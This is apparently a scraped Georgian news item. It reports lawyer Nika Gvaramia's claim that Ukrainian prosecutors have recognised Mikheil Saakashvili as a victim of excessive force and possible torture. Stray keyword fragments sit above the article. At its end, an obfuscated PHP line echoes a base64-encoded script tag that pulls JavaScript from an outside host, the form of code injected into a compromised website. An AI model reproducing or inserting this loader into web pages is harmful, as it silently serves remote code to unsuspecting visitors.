celsiusi
ავერსი შნაიდერი
საქართველოს მესამე პრეზიდენტის, მიხეილ სააკაშვილის ადვოკატის, ნიკა გვარამიას განცხადებით, მიხეილ სააკაშვილი უკრაინის პროკურატურამ დაზარალებულად ცნო.
 
ნიკა გვარამიას განცხადებით, უკრაინის გენერალურმა პროკურატურამ მიხეილ სააკაშვილის წინააღმდეგ ჩადენილი ქმედებები დაადასტურა და ახლა მხოლოდ ბრალდებულების გამოვლენაა დარჩენილი.
 
„ბოლო ინფორმაცია უკრაინიდან, მოგეხსენებათ, რომ იქ იყო აღძრული საქმე სააკაშვილის წინააღმდეგ ძალის გადაჭარბების და შესაძლო წამების ფაქტების შესახებ. დღეს უკვე მიხეილ სააკაშვილი ცნობილია დაზარალებულად. ანუ არსებობს ფაქტი, არსებობს დაზარალებული, ერთადერთი ნაბიჯი, რომელიც გადასადგმელი დარჩა ეს არის ბრალდებულების გამოვლენა და სავარაუდოდ, ეს იქნებიან საქართველოს სამართალდამცავი ორგანოები და შესაძლოა არა მხოლოდ სამართალდამცავი ორგანოების, მაღალი თანამდებობის პირები და არა მხოლოდ მაღალი თანამდებობის პირები“, - განაცხადა ნიკა გვარამიამ.
1047
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");